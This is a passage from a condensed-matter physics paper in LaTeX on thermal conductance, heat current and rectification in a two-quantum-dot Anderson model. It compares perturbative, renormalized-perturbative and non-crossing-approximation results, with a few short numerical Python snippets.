&&g_{\nu}^{<}(\omega _{1})g_{\bar{\nu}}^{<}(\omega
_{2})g_{\bar{\nu}}^{>}(\omega _{1}+\omega _{2}-\omega ), \label{sl2}
\end{eqnarray}
where $g_{\nu}^{a}=\bar{g_{\nu}^{r}}$ is the advanced non-interacting Green's function.
Some integrals can be calculated analytically as described in Ref. \onlinecite{none}.
One shortcoming of the approach is that it does not guarantee the conservation of the particle and energy currents.
This means that in general the approximation gives $J_N^L \ne J_N^R$ and $J_E^L \ne J_E^R$
[see Eqs. (\ref{jelr}) and (\ref{jnu})], contrary to what one expects.
In our case, however, $J_N^L=J_N^R=0$ within numerical precision, so that the particle current is conserved. Concerning the energy current,
the relative deviation
\begin{equation}\label{d}
d=|J_Q^L/J_Q-1|=|J_Q^R/J_Q-1|,
\end{equation}
is usually of the order of 2\% or less,
but reaches a value near 14\% at high temperatures and the largest values of $U$ considered
with this method in Section IV ($U=7 \Gamma$). In the calculations, we will define the range of validity of the method as that corresponding to a small value of this deviation.
\subsubsection{Renormalized perturbation theory (RPT)}
\label{rpt}
For $U \gg \Gamma$ the approach mentioned above fails. However, for energy scales below
$T_K$ one can use renormalized perturbation theory (RPT).
For energy scales of the order of $T_K$ or larger,
the method loses accuracy and a complementary approach is needed.
The basic idea of RPT is to calculate the Green's functions of
Eq. (\ref{2o}) with the second-order self-energy evaluated in terms of renormalized
parameters, the small expansion parameter being
$\widetilde{U}/(\pi \widetilde{\Gamma })$. These parameters correspond to
fully dressed quasiparticles, taking the equilibrium Fermi-liquid picture as a basis.\cite{he1}
The renormalized parameters can be
calculated exactly using Bethe ansatz, or with high accuracy
using numerical renormalization group.\cite{cb,re1} The resulting values of $\widetilde{U}/(\pi \widetilde{\Gamma })$ are small, being usually below 1.1
even for $U \rightarrow \infty$.\cite{cb,ct}
Our RPT procedure consists of using renormalized parameters for $E_L=E_R$, $U$ and $\Gamma $
obtained at $\mu_L=\mu_R=T_L=T_R=0$ by a numerical-renormalization-group calculation,\cite{cb,ct}
and incorporating perturbations up to second order in the
renormalized $U$ ($\widetilde{U}$). It has been shown explicitly that this satisfies
important Ward identities even away from equilibrium.\cite{ng,ct}
At equilibrium, the method provides results that coincide
with those of state-of-the-art techniques for the dependence of the electrical conductance on
magnetic field \cite{cb} and temperature.\cite{ct}
As in the case of PT, the conservation laws are not guaranteed and the relative deviation defined in Eq. (\ref{d}) is a control parameter to define the validity of the results
obtained with this method.
\subsubsection{Non-crossing approximation (NCA)}
\label{nca}
The NCA technique is one of the standard tools for calculating these Green's functions
in the Kondo regime, where the total occupancy of the interacting subsystem
is near 1 and charge fluctuations are small
(the charge is well localized in the dot or dots). It corresponds to evaluating the self-energy for the non-equilibrium Green's functions entering Eqs. (\ref{jelr}) and (\ref{jnu})
via the summation of an infinite series of diagrams (all those in which the propagators do not cross) in perturbation theory in the couplings $\Gamma_\nu$.\cite{win,roura_1,tosib}
The formalism is explained in detail in Ref. \onlinecite{tosib} for a model which
contains the present one as a limiting case.
The main limitation of the approach is that it fails to reproduce Fermi-liquid properties at
equilibrium at temperatures well below the characteristic Kondo temperature.\cite{win}
The NCA has been
successfully applied to the study of a variety of systems, such as
C$_{60}$ molecules displaying a quantum phase transition,\cite{serge,roura_2}
a nanoscale Si transistor,\cite{tetta}
two-level quantum dots,\cite{tosi_1} and the interplay between vibronic effects and the Kondo effect.\cite{desint,sate}
Recently it has also been used to calculate heat transport.\cite{dare1,diego,dare2}
In spite of this success, the NCA has some
limitations at very low temperatures (below $\sim 0.1 T_{K}$). For example,
it does not satisfy accurately the Friedel sum rule at zero
temperature.\cite{fcm}
In this sense it is complementary to RPT, which should be accurate for $T_L, T_R \ll T_K$.
In contrast to the previous methods, NCA conserves the charge current, as shown explicitly in Ref. \onlinecite{tosib}.
We find that the NCA also conserves the energy current.
\subsection{Evaluation of the Kondo temperature}
\label{tk}
In order to compare the results of different approximations, it is convenient to represent the results
taking the unit of energy as the Kondo temperature $T_K$ which is the only relevant energy scale at small temperatures.
The evaluation of $T_K$ in the Anderson impurity model on the basis of PT, RPT and NCA has been addressed in several works in the literature. Because of some details of the different approximations (like the high-energy
cutoff, for example), the resulting values of $T_K$ differ, although they are of the same
order of magnitude.
Here,
we follow Ref. \onlinecite{asym}, which is based on the analysis of the electrical conductance
as a function of temperature $G(T)$ of a similar physical system. In the model under investigation, the electrical conductance vanishes, as already mentioned. However, it is possible to define an Anderson impurity model, equivalent to ours at equilibrium,
with non-vanishing $G(T)$,
which has the same $T_K$ as the model of Eq. (\ref{ham}). Recalling that the hybridization to the leads is given by $\Gamma_L=\Gamma_R=\Gamma$,
the equivalent spin-degenerate Anderson impurity model has
hybridization $\Gamma/2$ for each spin orientation and each lead (this is actually the simplest Anderson model that describes the conductance through a spin degenerate QD).
At equilibrium, the latter has the same spectral density and the same $T_K$ as our 2-dot model of Eq. (\ref{ham}). Hence, we can use the method of Ref. \onlinecite{asym} to calculate $T_K$.
In particular, we can extract $T_K$ from the temperature dependence of the electrical conductance $G(T)$. As explained in that reference, such a procedure is more reliable than alternative methods, like fitting the spectral density or the non-equilibrium electrical conductance $G(V_b)$
as a function of bias voltage $V_b=(\mu_L-\mu_R)/e$.
For example, different procedures to fit the line shape of $G(V_b)$
for the same physical system yield values of $T_K$ that differ by a factor of two.\cite{asym}
Concretely, we fitted $G(T)$ with a popular phenomenological expression
for the parameters used in Section \ref{res} with $U \rightarrow \infty$.
The renormalized parameters for RPT were taken from previous calculations.\cite{cb,ct} The result is
$T_K=0.00441 \Gamma$ for the RPT and $T_K=0.00796 \Gamma$ for the NCA.
In the symmetric cases with $U= 7 \Gamma$ and $U= 4 \Gamma$, we have obtained $T_K$ from the condition
$G(T_K)=G(T=0)/2$ with the result $T_K=0.191 \Gamma$ for $U= 7 \Gamma$ and $T_K=0.495 \Gamma$
for $U= 4 \Gamma$.
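As an aside, the criterion $G(T_K)=G(T=0)/2$ is easy to apply to a sampled conductance curve. A minimal sketch (illustrative only; we assume the commonly used Goldhaber-Gordon empirical form with $s=0.22$, which may differ from the phenomenological expression actually fitted):

```python
import numpy as np

def G_emp(T, TK, G0=1.0, s=0.22):
    """Empirical Kondo conductance curve; by construction G_emp(TK) = G0/2."""
    return G0 / (1.0 + (2.0**(1.0 / s) - 1.0) * (T / TK)**2)**s

# extract TK from a sampled G(T) curve via the half-conductance criterion
T = np.logspace(-3, 1, 400)                # temperatures, arbitrary units
G = G_emp(T, TK=0.008)                     # synthetic "data" with known TK
TK_est = np.interp(0.5, G[::-1], T[::-1])  # temperature where G = G0/2
```

The reversed arrays are needed because `np.interp` requires the abscissa ($G$ here) to be increasing.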
\section{Results for a symmetric device}
\label{res}
In this section we analyze and compare results for the thermal response of the system under investigation, calculated with the different methods presented in the previous section.
All calculations in this Section were done for $\mu_L=\mu_R=0$, $E_L=E_R=E$, and
$\Gamma_L=\Gamma_R=\Gamma$. In this case the system has reflection symmetry under a plane
bisecting the device.
\subsection{Thermal conductance}
\label{tcond}
We start by analyzing the behavior of the thermal conductance defined by Eq. (\ref{kappa}). For weak coupling to the reservoirs, and in the symmetric case $E_\nu=-U/2$, we can expand
Eq. (\ref{jqyada}) up to linear order in $\Delta T$ and we get the following result,
\begin{equation}\label{kappa-weak}
\kappa(T)= \frac{\Gamma_Q}{4 k_B} \; e^{U/2k_B T}\left[\frac{U}{T} f_R(U/2)\right]^2.
\end{equation}
This expression is exact in the limit $\Gamma \ll k_B T, U$.
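Equation (\ref{kappa-weak}) can be evaluated directly. A minimal sketch (illustrative only; units with $\Gamma_Q=k_B=1$), showing the exponential suppression at low $T$ and the maximum at intermediate temperatures:

```python
import numpy as np

def kappa_weak(T, U, Gamma_Q=1.0, kB=1.0):
    """Weak-coupling thermal conductance of Eq. (kappa-weak), with
    f(U/2) = 1/(exp(U / 2 kB T) + 1) the Fermi function of the right lead."""
    f = 1.0 / (np.exp(U / (2.0 * kB * T)) + 1.0)
    return Gamma_Q / (4.0 * kB) * np.exp(U / (2.0 * kB * T)) * (U / T * f)**2

T = np.linspace(0.05, 20.0, 2000)  # temperatures in units of Gamma
kappa = kappa_weak(T, U=7.0)       # nonmonotonic: suppressed at low and high T
```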
\begin{figure}[h!]
\begin{center}
\includegraphics[clip,width=\columnwidth]{kthper.eps}
\caption{(Color online) Main panel: Thermal conductance as a function of the temperature for the symmetric configuration $E_L=E_R=-U/2$ and different values of $U$, calculated with PT (see
Section \ref{pert}). The dotted line
indicates the weak-coupling prediction Eq. (\ref{kappa-weak}) for $U/\Gamma=7$. The thin line corresponds to the quantum of thermal conductance [Eq. (\ref{quantum})].
Inset: Low-temperature part of the plots for $U/\Gamma=4, 7$, with the temperature expressed in units of $T_K$. The limit $U \rightarrow \infty$, calculated with RPT, is also shown by the
dash-dot-dot line.}
\label{figkthper}
\end{center}
\end{figure}
Results for strong-coupling to the reservoirs are shown in Fig. \ref{figkthper}. We consider $\Gamma_L=\Gamma_R=\Gamma$, $\mu_L=\mu_R=0$. The results of the figure are calculated with the perturbation theory presented in Section \ref{pert}. The values of the Coulomb interaction $U$ have been chosen within the range
where the method has been shown to be reliable for the description of the electrical conductance.\cite{ogu} We have also verified that, for these values, the conservation of the energy current is satisfied within
an error of $14\%$ at most. For $U/\Gamma=7$, we also include the prediction of Eq. (\ref{kappa-weak}) (dotted line in the main panel). The latter tends to coincide with the results of PT in the high-temperature limit.
In Fig. \ref{figkthper} we also indicate the reference defined by the quantum of thermal
conductance $\kappa_0$ [see Eq. (\ref{quantum})], which defines an upper bound per transmission channel. At low temperatures, $T\ll T_K$,
we find by a numerical fit of the results that $\kappa \sim T^4$. For $T \sim 0.5 T_K$ the dependence on $T$ evolves to linear. The slope of $\kappa$ for $T < \Gamma$ becomes closer to the slope of
$\kappa_0$ as $U$ increases. At temperatures $k_B T \sim \Gamma$
the conductance achieves a maximum and then decreases exponentially for larger $T$. The low-temperature regime can be further analyzed by representing the thermal conductance as a function of $T/T_K$ (see inset of Fig. \ref{figkthper}).
The method used to determine $T_K$ is discussed in Section \ref{tk}.
The limiting case of $U\rightarrow \infty$, calculated with RPT (valid for $T \ll T_K$), is also shown. These results suggest a universal behavior of $\kappa$, independent of $U$, deep in the Kondo regime at small temperatures. Some deviations are however noticeable for $U=4 \Gamma$ for which charge fluctuations are very important, and the system is not strictly in the Kondo regime
$-E_\nu, E_\nu+U \gg \Gamma$.
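The exponent in $\kappa \sim T^4$ can be extracted from numerical data by a straight-line fit on a log-log scale. A minimal sketch with synthetic power-law data (illustrative only; the prefactor is arbitrary):

```python
import numpy as np

def power_law_exponent(T, kappa):
    """Slope of log(kappa) versus log(T), i.e. the exponent n in kappa ~ T^n."""
    return np.polyfit(np.log(T), np.log(kappa), 1)[0]

T = np.logspace(-2, -1, 50)       # synthetic data: T/T_K well below 1
kappa = 0.3 * T**4                # kappa = A T^4 with arbitrary prefactor A
n = power_law_exponent(T, kappa)  # recovers n = 4
```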
\begin{figure}[h!]
\begin{center}
\includegraphics[clip,width=\columnwidth]{kcnca.eps}
\caption{(Color online) Main panel: Low-temperature behavior of the thermal conductance in the limit $U \rightarrow \infty$ for $E_L=E_R=-4\Gamma$, as a function of $T/T_K$, calculated with RPT (see Section \ref{rpt}) and NCA (see section \ref{nca}). The straight line corresponds to the quantum
bound [Eq. (\ref{quantum})]. Inset: Thermal conductance as a function of $T$ calculated with NCA.
}
\label{figkthuinf}
\end{center}
\end{figure}
In Fig. \ref{figkthuinf} we present results for the thermal conductance in the limit $U \rightarrow \infty$ for temperatures below $T_K$. We compare the results obtained with NCA
(see Section \ref{nca}) and RPT (Section \ref{rpt}). In this case, the parameters do not correspond
to the symmetric configuration. However, they correspond to the Kondo regime $-E_\nu, E_\nu+U \gg \Gamma$.
NCA overestimates the thermal conductance at the lowest temperatures, leading to a prediction higher than the upper bound
$\kappa_0$. This method is known to fail in describing the electrical conductance at very low $T$.\cite{win,asym} Here, we see that it is also inadequate to predict the low-temperature behavior of the thermal conductance.
In the case of RPT, the conservation of the energy current is satisfied to a good degree for
$T \leq 0.4 T_K$ with $d <5\%$ [see Eq. (\ref{d})]. This suggests the validity of this method to calculate the thermal conductance at low temperature.
As in the symmetric case shown in the inset of Fig. \ref{figkthper}, the behavior is consistent with a power law $\kappa \sim T^4$.
RPT overestimates the response at higher temperatures, close to $T_K$, where it is not expected to be valid.\cite{ng}
The fact that the RPT result for $\kappa (T)$ is above the upper bound given by Eq. (\ref{quantum})
for $T=T_K$ clearly shows the breakdown of the approximation at this temperature. In fact,
for increasing temperature, the error in the conservation of the current increases.
Specifically, the relative deviation $d$ is below 1\% for $T < 0.23 T_K$, increases to 7.7\% for
$T=T_K/2$ and to nearly 17\% for $T=T_K$. Overall, the analysis of these results suggests that deep in the Kondo regime, $T\ll T_K$, RPT is very likely to predict the correct behavior of $\kappa(T)$, while
for $T > T_K/2$, the NCA results are more reliable. Therefore, as in the case of the electric current,\cite{asym} both approaches are complementary.
It is encouraging to see that
in the transition between the range of validity of both approaches, they give the same order of magnitude of the thermal conductance when the results are scaled by the corresponding $T_K$.
The important physical outcome of this analysis is that we find a significant enhancement of the thermal response deep in the Kondo regime, in relation to the limit of weak coupling to the reservoirs.
Concretely, $\kappa \sim T^{4}$ for $T \ll T_K$, and $\kappa \propto T$ for $T\sim T_K$, with a proportionality constant smaller than the one in the quantum bound of Eq. (\ref{quantum}). This is in contrast
with the exponentially small thermal conductance at low temperatures given by Eq. (\ref{kappa-weak}), in the case of very low coupling to the reservoirs.
\subsection{Far-from-equilibrium thermal response}
The aim of the present section is to analyze the thermal current when $\Delta T= T_L-T_R >0$. As in the previous section, we consider $\Gamma_L=\Gamma_R=\Gamma$, $\mu_L=\mu_R=0$.
\subsubsection{Dependence of thermal current on $\Gamma_\nu$}
\label{depdelta}
\begin{figure}[h!]
\begin{center}
\includegraphics[clip,width=\columnwidth]{gam.eps}
\caption{Thermal current as a function of the dot-lead couplings for $T_L=2T_R$,
$U=k_BT_R/10$, and $E_L=E_R=-U/2$.}
\label{figdelta}
\end{center}
\end{figure}
We start by presenting in Fig. \ref{figdelta} results for small $U=k_BT_R/10$, where $T_R$ is the temperature of the coldest reservoir, in the symmetric configuration where $E_L=E_R=-U/2$. These parameters correspond to the high-temperature regime where the Kondo effect is not developed in equilibrium.
The evaluation has been done with perturbation theory, as explained in Section \ref{pert}, which is accurate within the range $\Gamma \gg U$.
In the weak-coupling limit, with $\Gamma < U$, the thermal current is given by Eq. (\ref{jqf}), which for the symmetric configuration reduces to Eq. (\ref{jqyada}).
In the description of PT, the heat current increases linearly with $\Gamma$ for small values of this parameter, as in Eq. (\ref{jqyada}).
For larger
$\Gamma$, the slope decreases and $J_Q$ reaches a maximum for $\Gamma \sim 0.8 T_R$. Then, it decreases for larger $\Gamma$. For all values of $\Gamma$ the relative deviation of the method in the conservation of the energy current $d$ is below 1\%. Interestingly, the qualitative behavior of $J_Q$ calculated with PT is very similar to the one presented in Ref. \onlinecite{yada}, on the basis of a saddle point approximation within the path-integral formalism.
\subsubsection{Dependence of the thermal current on $\Delta T$}
\label{dept}
\begin{figure}[h!]
\begin{center}
\includegraphics[clip,width=7.5cm]{fig6.eps}\\
\caption{(Color online) Thermal current as a function of $T_L=\Delta T$ for $T_R=0$,
$E_L=E_R=-U/2$ and several values of $U$. The dotted line corresponds to Eq. (\ref{jqyada}) with $U=7\Gamma$.}
\label{figt}
\end{center}
\end{figure}
We now take $T_R=0$ and analyze the dependence of $J_Q$ on $T_L=\Delta T$,
using perturbation theory in $U$ for the symmetric case $E=E_L=E_R=-U/2$, as above.
We consider several values of $U$ within the validity of PT.
The results are shown in Fig. \ref{figt}. As in the previous section, we evaluate the limits of this
approach from the relative error in the conservation of the energy current
$d$. We have verified that it is negligible for very small temperatures
and moderate values of $U$, while it reaches a value of 12.6 \% for $U=7 \Gamma$ and $T_L \sim 2 \Gamma$, decreasing slowly with further increase in $T_L$.
For $U=7 \Gamma$, the system is in the Kondo regime ($-E, E+U \gg \Gamma$) at low temperatures and at equilibrium. Correspondingly, the spectral
density has a well defined peak at the Fermi energy (the Kondo peak) separated from the charge-transfer peaks
near $E$ and $E+U$.
For $T_L$ well below $T_K$ (we verify this for $T_L < 0.04 \Gamma$), the heat current behaves as $J_Q \sim (\Delta T)^4$.
This remains true as long as the smaller temperature ($T_R$ in our case) is also much smaller than
$T_K$. For large $T_R$, $J_Q$ is linear in $\Delta T$ for small $\Delta T$.
For all values of $U$, after the initial slow increase of the thermal current with $\Delta T$, for
$\Delta T \sim \Gamma$, $J_Q$ increases approximately linearly with $\Delta T$, and when $\Delta T$ reaches a few times $U$ it finally saturates. For $U, T_R, \Delta T \gg \Gamma$, the thermal current is described by Eq. (\ref{jqyada}).
If in addition $T_L, T_R \gg U$, the heat current in the weak-coupling limit behaves as
\begin{equation}\label{bound}
J_Q \simeq \frac{\Gamma_Q U}{8} \; \left[ U \left(\frac{1}{T_R}-\frac{1}{T_L} \right) +\frac{E_L}{T_L}-\frac{E_R}{T_R} \right],
\end{equation}
which in the limit of $\Delta T \gg T_R$ saturates to $J_Q \sim \Gamma_Q U(U-E_R)/T_R $.
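The saturation value quoted above follows from Eq. (\ref{bound}) by letting $T_L \rightarrow \infty$, which can be checked numerically (illustrative sketch; units with $\Gamma_Q=k_B=1$ and hypothetical parameter values):

```python
def J_bound(T_L, T_R, U, E_L, E_R, Gamma_Q=1.0):
    """Weak-coupling heat current of Eq. (bound), valid for T_L, T_R >> U."""
    return Gamma_Q * U / 8.0 * (U * (1.0 / T_R - 1.0 / T_L)
                                + E_L / T_L - E_R / T_R)

# for T_L >> T_R the 1/T_L terms drop out and
# J_Q -> Gamma_Q * U * (U - E_R) / (8 * T_R)
```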
The result in the atomic limit described by Eq. (\ref{jqyada}) is shown as a dotted line in Fig. \ref{figt}
for $U= 7 \Gamma$.
Note that the saturation value of Eq. (\ref{jqyada}) for $T_R=0$ at high $T_L$ is $\Gamma_Q U/4$.
Therefore, for the units of $J_Q$ chosen, the curves for different $U$ coincide at large $\Delta T$.
Clearly, only for $U \gg \Gamma$ does the saturation value of $J_Q$ for large $\Delta T$ predicted by PT approach the corresponding value in the atomic limit.
As in the case of the thermal conductance, when the two reservoirs have temperatures $T_R, T_L < T_K$, there is a strong enhancement in the value of the thermal current, for dots strongly coupled to reservoirs relative to the case where they are weakly coupled. In fact, the current is exponentially small at low temperatures for weakly coupled quantum dots. Instead,
within the Kondo regime, $J_Q \propto (\Delta T)^4$ for $T_R, T_L \ll T_K$, while $J_Q \propto (\Delta T) $ if either $\Delta T > T_K/2$ or the temperature of the coldest lead $T_R > \Delta T$.
Note that the latter case corresponds to the calculation of the thermal conductance defined by
Eq. (\ref{kappa}).
\subsubsection{The limit $U \rightarrow \infty$}
\label{uinf}
Here we choose parameters corresponding to the Kondo regime
(defined by $-E_\nu, E_\nu+U \gg \Gamma$) at equilibrium: $E_L=E_R=E=-4 \Gamma$, and
$U \rightarrow \infty$, and calculate the current using RPT and NCA (see Sections \ref{rpt}, \ref{nca}) as a function of $\Delta T$, keeping $T_R=0$ (RPT) or a small fraction of the
Kondo temperature (NCA) so that the results are indistinguishable from those of $T_R=0$ at equilibrium.
As in Section \ref{tcond}, in order to compare the results of RPT and NCA we scale the properties by
the corresponding Kondo temperature obtained previously,\cite{asym} as explained in that Section.
\begin{figure}[h!]
\begin{center}
\includegraphics[clip,width=\columnwidth]{jnca2.eps}
\caption{Thermal current as a function of $\Delta T$ for $U \rightarrow \infty$
and $E=-4 \Gamma$. Inset: Thermal current calculated with NCA for a wide range of temperatures.}
\label{figuinf}
\end{center}
\end{figure}
The result for $J_Q$ as a function of $\Delta T$ is shown in Fig. \ref{figuinf}. For small
temperatures $T < 0.2 T_K$, the RPT result is more reliable and shows a dependence $J_Q \sim (\Delta T)^4$.
For $T > T_K$, the RPT breaks down.
We show in the inset of Fig. \ref{figuinf} only results calculated with NCA for a wide range of temperatures, including the
high-temperature regime $T \gg T_K$.
In the latter plot, we observe that at high temperatures
the thermal current saturates to a finite value. This behavior is the same as that observed for finite $U$ in the symmetric case (see Fig. \ref{figt}).
Notice that in the limit $\Gamma \rightarrow 0$ described by Eq. (\ref{jqf}), $J_Q \rightarrow 0$ for $U \rightarrow \infty$. Instead, the present results show that the thermal current
at finite coupling to the reservoirs is ${\cal O}(\Gamma^2)$. Eq. (\ref{jqf}) does not account for this contribution, since it
corresponds to the \textit{linear}-order term in $\Gamma$ of the thermal current.
\begin{figure}[h!]
\begin{center}
\includegraphics[clip,width=7cm]{jvse.eps}
\caption{(Color online) Full line: Thermal current as a function of dot energies $E$ for $k_B \Delta T =50 \Gamma$ and $U \rightarrow \infty$. Dashed line corresponds to $A/E^2$ where $A$ is a constant.}
\label{jvse}
\end{center}
\end{figure}
The above analysis has been done at a finite $E$, and one might wonder if a finite current remains
for $U \rightarrow \infty$ keeping $E=-U/2$ (symmetric case). For technical reasons, we cannot directly address this question with the methods used in the present section.
We can in any case gather some intuition by calculating the dependence of the
thermal current on $E$ within NCA at a high temperature $T \gg T_K$.
The result is shown in Fig. \ref{jvse}. The current decreases with increasing $-E$.
We find that the dependence on the energy levels of both dots (taken equal) is very near
$E^{-2}$ for $|E| \gg k_B \Delta T$. This result indicates that the thermal current vanishes for
$U \rightarrow \infty$ in the symmetric case $E=-U/2$. The reason for such a different behavior between the symmetric and non-symmetric configurations is that in the former there is a vanishing spectral weight at the Fermi energy.
In fact, for the far-from-equilibrium situation analyzed here, the Kondo peak that develops at equilibrium is completely melted and the spectrum consists of the two Coulomb-blockade peaks, which for $U \rightarrow \infty$ lie at an infinitely high energy.
Instead,
for the parameters of Fig. \ref{figuinf}, there is some finite spectral weight at the energies $E_L=E_R$, which enables the thermal transport.
\subsubsection{Dependence of thermal current on $U$}
\label{depu}
\begin{figure}[h!]
\begin{center}
\includegraphics[clip,width=\columnwidth]{tvarias.eps}
\caption{(Color online) Thermal current as a function of $U$ for different $\Delta T=T_L$,
$T_R=0$, and $E_L=E_R=-U/2$. Results have been multiplied by a factor in some cases, in order to present them on the same scale.}
\label{figtv}
\end{center}
\end{figure}
In Fig. \ref{figtv} we show the thermal current as a function of $U$ calculated with PT in the symmetric configuration $E_L=E_R=-U/2$, for different $\Delta T=T_L$,
keeping $T_R=0$. Since the thermal current depends strongly on $\Delta T$ for
small $\Delta T$,
the values have been multiplied by the factors indicated in the figure in order to present them on the same scale.
In spite of the different magnitude, the different curves show a similar dependence, with
a $U^2$ behavior for small $U$. We restrict the range of values $U$ to those satisfying the criterion of validity of the perturbative approach.
At intermediate $T_L$,
($0.5 \Gamma$ and $\Gamma$), the curves show a maximum within the interval of $U$ shown.
According to the limit of small $\Gamma$ [Eqs. (\ref{jqf}), (\ref{jqyada})], one expects that for large $\Delta T$ there is a maximum in the thermal current at an intermediate value of $U$. Since at high temperatures, the effects of correlations are expected to be less important, we have also calculated $J_Q$ for $\Delta T=10 \Gamma$ as a function of $U$ for an interval, which includes large values of $U$ lying (at least in principle) beyond the validity of the approach,
and compare it with the result in the atomic limit
$\Gamma_\nu \rightarrow 0$ [Eq. (\ref{jqyada})].
The result is shown in Fig. \ref{figt10}. Taking into account the
limitations of both approximations, the results are surprisingly similar. In particular, both approaches lead to a maximum in the thermal current for $U \sim 3 \Delta T$. For small $U$ the perturbative approach gives a quadratic dependence on $U$. The dependence is also quadratic in the atomic limit [Eq. (\ref{jqf})] for the symmetric case $E_\nu=-U/2$ if in addition both
$T_L, T_R >0$, but it is linear in $U$ in other cases (Fig. \ref{figt10}
corresponds to the symmetric case with $T_R=0$).
\begin{figure}[h!]
\begin{center}
\includegraphics[clip,width=\columnwidth]{t10.eps}
\caption{(Color online) Same as Fig. \ref{figtv} for $\Delta T=T_L=10 \Gamma$.
Dashed line corresponds to Eq. (\ref{jqyada}).}
\label{figt10}
\end{center}
\end{figure}
It is clear that in the atomic limit [Eq. (\ref{jqf}) or Eq. (\ref{jqyada}) for the symmetric case $E_\nu=-U/2$ plotted in dashed line in Fig. \ref{figt10}], the heat current $J_Q$ vanishes for infinite Coulomb repulsion $U \rightarrow \infty$. While the perturbative result (full line in Fig. \ref{figt10}) lies above the prediction of the analytic expression in the atomic limit for large $U$, perturbation theory
loses its validity for large $U$ and cannot settle the issue of whether $J_Q$ is finite for $U \rightarrow \infty$. However, the NCA results presented in the previous section indicate that
in the symmetric case (keeping $E=-U/2$), $J_Q \rightarrow 0$ for $U \rightarrow \infty$, as discussed previously.
Concerning negative values of $U$, in the symmetric case $E_{\nu}=-U/2$, using the transformation Eq. (\ref{shiba}) one concludes that $J_Q(-U)=J_Q(U)$.
It is easy to check that Eq. (\ref{jqyada}) has this property. We have verified that this is also the case for the perturbative results.
\section{Rectification}
\label{recti}
In the calculations presented before we have considered $E_L=E_R$, although the analytical
results in the atomic limit $\Gamma_\nu \rightarrow 0$ [Eq. (\ref{jqf})] are valid for
arbitrary $E_\nu$. One effect of having different $E_\nu$ is the loss of the Kondo effect,
in a similar way as the application of a magnetic field in the simplest impurity Anderson model.
Another effect is that the current has a different magnitude when changing the sign of
$\Delta T$. This rectification effect might be important for applications.\cite{craven}
To keep our convention $T_L > T_R$, we analyze the effect of reflecting the device through the plane that separates the left and right parts, instead of inverting the temperature.
The result for the magnitude of the current is the same.
Note that if the system has reflection symmetry ($E_L=E_R$, $\Gamma_L=\Gamma_R$, $\mu_L=\mu_R$),
the magnitude of the current should be unchanged if $\Delta T$ is inverted. Eq. (\ref{jqf})
satisfies this symmetry requirement.
In this Section we keep $\mu_L=\mu_R=0$. Importantly, if the asymmetry is introduced only in the couplings ($\Gamma_L \neq \Gamma_R$), there is no rectification in the atomic limit, since
both $\Gamma_\nu$ enter only the prefactor of Eq. (\ref{jqf}). Instead, calculations with the NCA show some rectification effect taking asymmetric couplings but the effect is small and is not reported here.
Concerning PT, for small
$U$ the rectification effect is too small, while for large $U$ the error in the conservation
of the current increases rapidly, and we consider that the results are not reliable enough.
Therefore, in what follows we also take $\Gamma_L=\Gamma_R$ and study the effect of different $E_\nu$ on the rectification, using Eq. (\ref{jqf}) for $\Gamma_\nu \rightarrow 0$ and the NCA
for other cases.
\begin{figure}[h!]
\begin{center}
\includegraphics[clip,width=\columnwidth]{rectif_atom_limt_EL-5.0_ER-14.3_TR1.eps}
\caption{(Color online) Thermal currents given by Eq. (\ref{jqf}) as a function of
$\Delta T$ for $T_R=\Gamma$, $\Gamma_L=\Gamma_R=\Gamma $, $U=20 \Gamma$
and full line $E_L=-14.3 \Gamma$, $E_R=+5\Gamma$ (level nearest to the Fermi energy next to the cold lead), dashed line $E_L=+5\Gamma$, $E_R=-14.3\Gamma$ (level nearest to the Fermi energy next to the hot lead).}
\label{rectif-1}
\end{center}
\end{figure}
In Fig. \ref{rectif-1} we show an example of this rectification effect in the atomic limit.
We have taken one level below and the other one above the Fermi energy.
We find that the magnitude of the heat current, labeled $J_{+}$ in the figure, is larger
when the level above the Fermi energy is next to the lead with the lower temperature.
The current in the opposite direction is labeled $J_{-}$.
For this choice of parameters, the ratio between both
currents increases monotonically with $\Delta T$ until $\Delta T\sim 10\Gamma$ and then seems to saturate at a high value, of the order of $160$ (see inset of Fig. \ref{rectif-1}). We must warn, however, that such large values of the ratio $J_+/J_-$ are related to the exponentially small occupancies in the limit $\Gamma_\nu \rightarrow 0$. This effect
disappears for large $\Gamma_\nu$.
The rectification can be quantified by the ratio
\begin{equation}\label{r}
\mathcal{R}=\big\vert \frac{J_{+}-J_{-}}{J_{+}+J_{-}}\big\vert
\end{equation}
with $\mathcal{R}=1$ being the upper bound.
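Equation (\ref{r}) is straightforward to apply to a pair of computed currents. A minimal helper (illustrative only; the sample values mimic the saturation ratio of Fig. \ref{rectif-1}):

```python
def rectification(J_plus, J_minus):
    """Rectification coefficient R = |(J+ - J-) / (J+ + J-)|, bounded by 1."""
    return abs((J_plus - J_minus) / (J_plus + J_minus))
```

For the saturation ratio $J_+/J_- \sim 160$ of Fig. \ref{rectif-1}, this gives $\mathcal{R} \approx 0.99$.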
In Fig. \ref{rectif-2} we show the values of $\mathcal{R}$ within the atomic limit as a function of both $E_L$ and $E_R$, for a selected value $\Delta T=20\Gamma$, keeping the other parameters as in Fig. \ref{rectif-1}. Note that the choice of energy levels in Fig. \ref{rectif-1} corresponds to a region in which $\mathcal{R}\sim 1$.
There are two straight lines in Fig. \ref{rectif-2} that correspond to zero rectification.
Along one of them, $E_R=E_L$, both levels are degenerate and the ratio $\mathcal{R}$ vanishes
due to the reflection symmetry $L \longleftrightarrow R$.
The other line, $E_R=-U-E_L$, results from a combination of the reflection symmetry and the transformation of Eq. (\ref{shiba}). In fact, the equation for the transformed parameters,
$E_R^\prime=E_L^\prime$, using Eq. (\ref{shibap}) reduces to $E_R=-U-E_L$.
\begin{figure}[h!]
\begin{center}
\includegraphics[clip,width=\columnwidth]{mapa-atom-limit-DT20.eps}
\caption{(Color online) Rectification coefficient given by Eq. (\ref{r})
calculated in the atomic limit
as a function of both energy levels, for $\Delta T=20\Gamma$, $T_R=\Gamma$, and $U=20 \Gamma$.}
\label{rectif-2}
\end{center}
\end{figure}
There is another, nearly circular line along which $\mathcal{R}$ vanishes,
which is not related to symmetry properties
and lies inside a region of small rectification (and is therefore of marginal interest).
The region inside this line shrinks with increasing
temperature of the cold lead ($T_R$ in our case). Keeping the other parameters
of Fig. \ref{rectif-2} fixed, we find that this region
collapses to the point $E_L=E_R=-U/2$ for $T_R \sim 1.5 \Gamma$.
Near the upper right corner of Fig. \ref{rectif-2}, the magnitude of the heat current is larger
when the level above the Fermi energy is next to the lead with the lower temperature,
and there is a sign change in $J_+ - J_-$ when crossing the three lines mentioned above.
In Fig. \ref{recnca} we show the results for $\mathcal{R}$ obtained with the NCA for infinite $U$.
